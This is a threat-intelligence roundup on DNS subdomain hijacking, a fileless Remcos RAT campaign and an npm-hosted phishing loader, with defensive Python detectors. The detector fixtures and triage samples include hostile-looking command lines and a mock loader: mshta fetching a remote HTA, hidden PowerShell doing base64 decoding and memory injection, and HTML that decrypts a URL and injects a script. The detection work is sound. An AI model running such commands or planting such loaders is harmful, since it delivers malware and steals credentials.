
CTI Roundup: Hazy Hawk, Remcos RAT, and npm Phishing

Hazy Hawk uses DNS records to target domains, a new malware campaign delivers fileless Remcos RAT, and threat actors combine AES encryption and malicious npm packages in a novel phishing attack

Emerging Issue

This week, Tanium’s Cyber Threat Intelligence (CTI) team investigates how threat actors are exploiting forgotten or orphaned DNS records. Next up, our CTI team highlights a stealthy malware campaign that uses fileless execution techniques to deploy Remcos RAT. Finally, the team wraps up with an overview of a novel phishing campaign that uses a malicious npm (Node package manager) package as part of its delivery mechanism.

Hazy Hawk uses DNS records to target domains

A recent Infoblox report highlights how stale DNS records—especially those pointing to decommissioned cloud infrastructure—can be hijacked by attackers and used for malicious purposes. One actor, Hazy Hawk, is a DNS-savvy threat actor that is known to do just that.

Infoblox became aware of this actor in early 2025 after the actor gained control of subdomains belonging to the U.S. Centers for Disease Control and Prevention (CDC). Because these gaps in DNS are hard to find at scale, researchers believe that Hazy Hawk likely has access to a large passive DNS service.

So far, the attacker has been observed targeting dozens of organizations.

How Hazy Hawk targets cloud resources

Hazy Hawk specializes in hijacking abandoned cloud resources like AWS S3 buckets and Azure endpoints by exploiting forgotten DNS records. As Infoblox notes, executing these types of attacks requires an advanced and uncommon level of technical sophistication.

Hazy Hawk has become adept at identifying gaps in DNS records, hijacking domains, and repurposing them to host malicious URLs. To evade detection, the actor will hijack the subdomains of popular and reputable domains, obfuscate URLs, use content from other sites for their page, and redirect victims through at least one URL that uses a well-known service.

Victims of this attack are often directed into a traffic distribution system (TDS) that will decide where they should be sent.

Infoblox notes that the landing page often doesn’t match the initial lure. For example, many of the actor’s URLs leverage the previously hijacked “cdc.gov” subdomain, and redirect the victim through a Blogspot page, followed by a “.xyz” page.

Analyst comments from Tanium’s Cyber Threat Intelligence team

As Infoblox points out, Hazy Hawk is a reminder that “because DNS is not widely understood as a threat vector, these kinds of attacks can run undetected for long periods of time.”

This actor is actively targeting high profile organizations and doesn’t need to breach a perimeter to be successful.

This type of attack is hard to identify unless you actively monitor DNS hygiene, in particular by auditing your own records for CNAME targets that no longer exist.
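As an added example (not Infoblox’s or Tanium’s code), the following Python performs the DNS hygiene check that catches this pattern before an attacker does: it walks an organization’s CNAME records and flags targets that no longer exist. The provider suffix list, the example.gov zone data and the fake lookups are constructed for illustration (assumptions); in production, `resolves` would wrap a real DNS query and `bucket_exists` an HTTP HEAD against the bucket hostname.

```python
"""Dangling-CNAME triage for the subdomain-takeover pattern described above."""
import re
from dataclasses import dataclass
from typing import Callable, Iterable, List, Optional, Tuple

# Cloud hostname patterns that an attacker can re-create after the original owner deletes
# the resource. Illustrative set (assumption); extend it for the providers you use.
TAKEOVER_PRONE = {
    "aws-s3": re.compile(r"\.s3(?:[.-][a-z0-9-]+)?\.amazonaws\.com$"),
    "aws-elb": re.compile(r"\.elb\.amazonaws\.com$"),
    "azure-webapp": re.compile(r"\.azurewebsites\.net$"),
    "azure-trafficmanager": re.compile(r"\.trafficmanager\.net$"),
    "azure-cloudapp": re.compile(r"\.cloudapp\.azure\.com$"),
}


@dataclass(frozen=True)
class Finding:
    name: str       # our record, i.e. the subdomain an attacker would inherit
    target: str     # where the CNAME points
    provider: str
    reason: str


def classify(target: str) -> Optional[str]:
    """Return the provider key if the CNAME target looks like a re-creatable cloud resource."""
    t = target.rstrip(".").lower()
    for provider, pattern in TAKEOVER_PRONE.items():
        if pattern.search(t):
            return provider
    return None


def find_dangling(records: Iterable[Tuple[str, str]],
                  resolves: Callable[[str], bool],
                  bucket_exists: Callable[[str], bool]) -> List[Finding]:
    """Flag CNAMEs whose target no longer exists.

    `resolves(host)` answers whether a hostname still resolves; `bucket_exists(name)` answers
    whether an S3 bucket exists. Both are injected so the same logic runs against real
    lookups or, as here, against offline fakes.
    """
    findings: List[Finding] = []
    for name, target in records:
        target = target.rstrip(".").lower()
        provider = classify(target)
        if provider == "aws-s3":
            # S3 virtual-host names always resolve to Amazon; the dangling signal is a
            # bucket that no longer exists (the service answers NoSuchBucket).
            bucket = target.split(".s3", 1)[0]
            if not bucket_exists(bucket):
                findings.append(Finding(name, target, provider,
                                        "S3 hostname resolves but the bucket does not exist"))
        elif not resolves(target):
            reason = ("CNAME target returns NXDOMAIN; resource can be re-registered" if provider
                      else "CNAME target returns NXDOMAIN; check whether the domain has expired")
            findings.append(Finding(name, target, provider or "unknown", reason))
    return findings


# Constructed sample zone export plus fake lookups so the example runs offline.
SAMPLE_ZONE = [
    ("assets.example.gov", "old-campaign.s3.amazonaws.com"),   # bucket deleted, DNS still resolves
    ("portal.example.gov", "portal-2019.azurewebsites.net"),   # web app decommissioned
    ("www.example.gov", "www-prod.azurewebsites.net"),         # still running
    ("vendor.example.gov", "portal.defunct-vendor.example."),  # third-party domain, now NXDOMAIN
    ("mail.example.gov", "mx.example.net"),                    # healthy, not a cloud pattern
]
LIVE_HOSTS = {"www-prod.azurewebsites.net", "old-campaign.s3.amazonaws.com", "mx.example.net"}
EXISTING_BUCKETS = {"www-assets"}


def fake_resolves(host: str) -> bool:
    return host in LIVE_HOSTS


def fake_bucket_exists(bucket: str) -> bool:
    return bucket in EXISTING_BUCKETS


if __name__ == "__main__":
    for f in find_dangling(SAMPLE_ZONE, fake_resolves, fake_bucket_exists):
        print(f"{f.name} -> {f.target} [{f.provider}] {f.reason}")
```

The S3 branch is the one that matters most: an S3 virtual-host name resolves whether or not the bucket exists, so an NXDOMAIN-only check misses exactly the abandoned-bucket case. Run the check against a zone export on a schedule and treat every finding as a record to delete, not a ticket to defer.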

New malware campaign delivers fileless Remcos RAT

A recent Qualys post highlights a stealthy malware campaign that uses fileless execution techniques to deploy Remcos RAT, which is a powerful remote access trojan (RAT).

The attack leverages PowerShell and Windows-native tools like “mshta.exe” to evade traditional endpoint defenses.

How the malware gets in and stays in

According to Qualys, the attack starts with a ZIP archive named “new-tax311.zip”. The archive contains a malicious LNK shortcut that invokes mshta.exe to run an obfuscated HTML Application (HTA) file.

The HTA file contains obfuscated VBScript written to bypass Windows Defender.

The VBScript then launches PowerShell with the execution policy bypassed and the window hidden, downloads further PowerShell scripts, and creates a registry key for persistence. The HTA also drops several payloads into the user’s Public directory, one of which runs at startup.

How the script delivers Remcos RAT

The PowerShell script, “24.ps1,” is obfuscated and padded with meaningless functions and variables. It uses custom string manipulation to decode two base64-encoded blobs, then calls Win32 APIs to allocate memory and inject and execute the decoded code in place, so the final payload never touches disk as a file.

One of the decoded blobs is believed to be the Remcos RAT binary. It is compiled with Visual C++ 8 (Visual Studio 2005) and uses several modules to establish persistence, gather system details, bypass UAC, and connect to its C2 domain.
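As an added example (not Qualys’s or Tanium’s detection content), the following Python links the stages described in the two sections above into a single detection over process-creation events: mshta.exe launching an HTA, a child PowerShell started with the execution policy bypassed and the window hidden, and a PowerShell command line that decodes base64 and calls memory-allocation APIs. The sample events, the regexes and the severity scoring are my own constructions (assumptions); the field names follow a generic Sysmon-style process-creation record rather than any specific product schema.

```python
import re
from typing import Any, Callable, Dict, Iterable, List

Event = Dict[str, Any]  # one process-creation record: pid, ppid, image, cmdline


def _image_is(ev: Event, exe: str) -> bool:
    return str(ev["image"]).lower().endswith("\\" + exe)


def _is_powershell(ev: Event) -> bool:
    return _image_is(ev, "powershell.exe") or _image_is(ev, "pwsh.exe")


def _cmd_has(ev: Event, pattern: str) -> bool:
    return re.search(pattern, str(ev["cmdline"]), re.I) is not None


# One predicate per behaviour in the chain described above. Patterns are assumptions.
RULES: Dict[str, Callable[[Event], bool]] = {
    "mshta_hta_launch": lambda ev: _image_is(ev, "mshta.exe")
        and _cmd_has(ev, r"https?://|\.hta\b|vbscript:|javascript:"),
    "ps_policy_bypass": lambda ev: _is_powershell(ev)
        and _cmd_has(ev, r"-e(?:p|xecutionpolicy)?\s+bypass"),
    "ps_hidden_window": lambda ev: _is_powershell(ev)
        and _cmd_has(ev, r"-w(?:indowstyle)?\s+hidden"),
    "ps_inmemory_loader": lambda ev: _is_powershell(ev)
        and _cmd_has(ev, r"FromBase64String")
        and _cmd_has(ev, r"VirtualAlloc|CreateThread|WriteProcessMemory"),
}


def tag_event(ev: Event) -> List[str]:
    return [tag for tag, pred in RULES.items() if pred(ev)]


def find_chains(events: Iterable[Event]) -> List[Dict[str, Any]]:
    """Report PowerShell activity that descends from an mshta.exe HTA launch."""
    by_pid = {int(ev["pid"]): ev for ev in events}
    tags = {pid: tag_event(ev) for pid, ev in by_pid.items()}
    best: Dict[int, Dict[str, Any]] = {}   # one report per mshta root, keep the richest
    for pid, ev_tags in tags.items():
        if not any(t.startswith("ps_") for t in ev_tags):
            continue
        lineage, cur = [pid], int(by_pid[pid]["ppid"])
        for _ in range(8):                  # bounded walk: ppid data can be missing or loop
            if cur not in by_pid:
                break
            lineage.append(cur)
            cur = int(by_pid[cur]["ppid"])
        roots = [p for p in lineage[1:] if "mshta_hta_launch" in tags[p]]
        if not roots:
            continue                        # PowerShell with no mshta ancestor: not this chain
        all_tags = sorted({t for p in lineage for t in tags[p]})
        report = {
            "root_pid": roots[-1],
            "lineage": lineage[::-1],       # root first
            "tags": all_tags,
            "severity": "high" if "ps_inmemory_loader" in all_tags else "medium",
        }
        if roots[-1] not in best or len(all_tags) > len(best[roots[-1]]["tags"]):
            best[roots[-1]] = report
    return list(best.values())


# Constructed sample telemetry mirroring the chain in the write-up (hostnames and paths are made up).
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EVENTS: List[Event] = [
    {"pid": 4120, "ppid": 1000, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 5312, "ppid": 4120, "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta.exe https://cdn.example.invalid/tax/doc.hta"},
    {"pid": 6044, "ppid": 5312, "image": PS,
     "cmdline": r"powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -File C:\Users\Public\24.ps1"},
    {"pid": 6120, "ppid": 6044, "image": PS,
     "cmdline": 'powershell.exe -w hidden -ep bypass -c "$b=[Convert]::FromBase64String($s);'
                '$p=[W]::VirtualAlloc(0,$b.Length,0x3000,0x40);[W]::CreateThread(0,0,$p,0,0,0)"'},
    {"pid": 7001, "ppid": 4120, "image": PS, "cmdline": "powershell.exe -NoProfile -Command Get-Process"},
    {"pid": 7300, "ppid": 2200, "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r"mshta.exe C:\Program Files\Vendor\setup.hta"},   # HTA with no suspicious child
]

if __name__ == "__main__":
    for chain in find_chains(EVENTS):
        print(chain)
```

Tagging a single event is noisy (administrators run `-ExecutionPolicy Bypass` legitimately, and vendors ship HTAs), so the signal is the lineage: the function walks ppid back to an mshta.exe ancestor and only then reports. The per-event predicates translate directly into Sigma selections over Sysmon Event ID 1, with ParentImage carrying the mshta link.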

Analyst comments from Tanium’s Cyber Threat Intelligence team

Many of the tactics, techniques, and procedures (TTPs) in this attack are consistent with nation-state and advanced persistent threat (APT) level actors, even though the final payload is a commodity RAT, which makes the campaign relevant to a wider set of defenders. The campaign combines several widely used techniques: fileless malware, living-off-the-land binaries (LOLBins) such as mshta.exe and PowerShell, and a commodity RAT.

This is yet another campaign that prioritizes defense evasion—a process that’s increasingly being automated by threat actors.


Threat actors combine AES and malicious npm packages in phishing campaign

Researchers at Fortra have discovered a novel phishing campaign that uses a malicious npm package as part of its delivery mechanism. The package, which was distributed through the npm registry, was designed to harvest credentials by mimicking legitimate modules.

How does the phishing attack work?

Fortra walked through a phishing attack that begins with an email carrying a malicious .HTM attachment. The email reached the inbox, likely because the attachment looks harmless to mail filters. The file contains an encrypted string that warranted further analysis and, once decrypted, pointed to a JavaScript file.

As Fortra notes, the JavaScript file was “part of a malicious npm package hosted under the guise of a typical open-source library.” The package would load and deliver a second stage script responsible for creating custom phishing links using the target’s email address, leading them to a fake Microsoft 365 login page.

What’s in the phishing email?

As noted, the phishing email contains a malicious .HTM file attachment. Upon further investigation, Fortra discovered that the file uses AES encryption to hide a string stored within a particular variable.

AES encryption is not often seen in phishing attachments, where actors usually rely on simpler obfuscation. After decrypting the string, Fortra found that it pointed to a URL on jsDelivr, a public CDN that serves files directly from npm packages and GitHub repositories.

Understanding the malicious npm package

By the time Fortra investigated, the npm package had already been blocked on the registry. Fortra was nonetheless able to install it with Node.js tooling and found that one of the downloaded folders, MOMENTUM, holds a file named “NOW.API.JS”, which is the next stage of the attack and loads additional malicious content.
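As an added example (not Fortra’s tooling), here is the static triage an analyst could run on such an attachment and on the URLs recovered after decryption: it scores the .HTM for the indicators described above (a client-side AES library, a decrypt call, a large opaque literal, and a script element created at runtime) and maps a jsDelivr URL back to the npm package name and version to pull from the registry. The sample .HTM, the placeholder ciphertext, the package name and the scoring threshold are constructed for illustration (assumptions).

```python
import re
from typing import Dict, List, Optional
from urllib.parse import urlparse

# Indicators for the attachment pattern described above. The regexes and the
# three-indicator threshold are my own choices (assumptions), not Fortra's logic.
INDICATORS = {
    "crypto_lib_referenced": re.compile(r"crypto-js|\bCryptoJS\b", re.I),
    "aes_decrypt_call": re.compile(r"AES\s*\.\s*decrypt\s*\(", re.I),
    # "U2FsdGVkX1" is base64 of "Salted__", the OpenSSL-style container CryptoJS emits
    # when AES is used with a passphrase rather than a raw key.
    "openssl_salted_blob": re.compile(r"[\"']U2FsdGVkX1[A-Za-z0-9+/=]{40,}[\"']"),
    "long_opaque_literal": re.compile(r"[\"'][A-Za-z0-9+/=]{200,}[\"']"),
    "runtime_script_load": re.compile(r"createElement\s*\(\s*[\"']script[\"']\s*\)", re.I),
}
SCRIPT_SRC = re.compile(r"<script[^>]+src\s*=\s*[\"']([^\"']+)[\"']", re.I)


def triage_htm(html: str) -> Dict[str, object]:
    """Score an .HTM attachment for the encrypted-loader pattern."""
    hits = {name: rx.search(html) is not None for name, rx in INDICATORS.items()}
    score = sum(hits.values())
    return {
        "indicators": hits,
        "external_scripts": SCRIPT_SRC.findall(html),   # statically visible script sources
        "score": score,
        "verdict": "suspicious" if score >= 3 else "review",
    }


JSDELIVR_NPM_PATH = re.compile(r"^/npm/((?:@[^/@]+/)?[^/@]+)(?:@([^/]+))?(/.*)?$")


def parse_jsdelivr_npm(url: str) -> Optional[Dict[str, str]]:
    """Map https://cdn.jsdelivr.net/npm/<pkg>@<version>/<path> back to the npm package."""
    u = urlparse(url)
    if u.hostname != "cdn.jsdelivr.net":
        return None
    m = JSDELIVR_NPM_PATH.match(u.path)
    if not m:
        return None             # e.g. a /gh/ (GitHub) path, which needs different handling
    return {"package": m.group(1), "version": m.group(2) or "latest", "path": m.group(3) or "/"}


def npm_packages_from_urls(urls: List[str]) -> List[Dict[str, str]]:
    return [p for p in (parse_jsdelivr_npm(u) for u in urls) if p]


# Constructed sample: the shape of the attachment, with a placeholder blob, not real ciphertext.
BLOB = "U2FsdGVkX1" + "9mQ3pX7v" * 30
SAMPLE_HTM = f"""<html><body>
<script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js"></script>
<script>
var k = "n0tTheRealKey";
var c = "{BLOB}";
var u = CryptoJS.AES.decrypt(c, k).toString(CryptoJS.enc.Utf8);
var s = document.createElement('script'); s.src = u; document.head.appendChild(s);
</script></body></html>"""

# Constructed URLs standing in for what decryption and the second stage would reveal.
RECOVERED_URLS = [
    "https://cdn.jsdelivr.net/npm/example-widget-lib@2.4.1/dist/now.api.js",
    "https://cdn.jsdelivr.net/gh/example-user/example-repo@main/loader.js",
    "https://login.example.invalid/?email=",
]

if __name__ == "__main__":
    print(triage_htm(SAMPLE_HTM))
    print(npm_packages_from_urls(RECOVERED_URLS))
```

Once the package is identified, fetch it into an isolated directory with `npm pack <name>@<version>` (or `npm install --ignore-scripts`) rather than a plain `npm install`, so that any install-time lifecycle script in the package does not run on the analysis host.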

How victims are redirected to phishing sites

Fortra identified a series of malicious URL redirections. The JavaScript referenced a known malicious URL, and the redirect site returned by that API was offline and had already been flagged by Cloudflare for phishing. Fortra then found a newer version of the package with updated URLs, one of which pointed to an active phishing page that redirected victims to a credential-harvesting landing page.

The final phishing site was offline at the time of Fortra’s investigation, so an earlier Any.Run sandbox report was used to obtain a screen capture of the page while it was live. It is a typical fake Microsoft 365 login page.

Analyst comments from Tanium’s Cyber Threat Intelligence team

As Fortra mentions, the different techniques used in this attack are not unique. But when combined, they create a more effective threat. Actors are now commonly blending TTPs to increase the effectiveness of their campaigns, and this one is no different.

Fortra’s analysis also reminds us that credential theft is, and will remain, a primary objective for threat actors. Because of this, staying ahead of these TTPs and up to date with the latest lures and tricks is essential.


Do you have insight into these stories that you want to share? Head over to Tanium’s discussion forum to start a conversation.

For further reading, catch up on our recent cyber threat intelligence roundups.

Tanium CTI

Tanium's Cyber Threat Intelligence (CTI) analysts process and extract trends from the daily cyber landscape to curate and deliver current intel to stakeholders around threats impacting business and security.
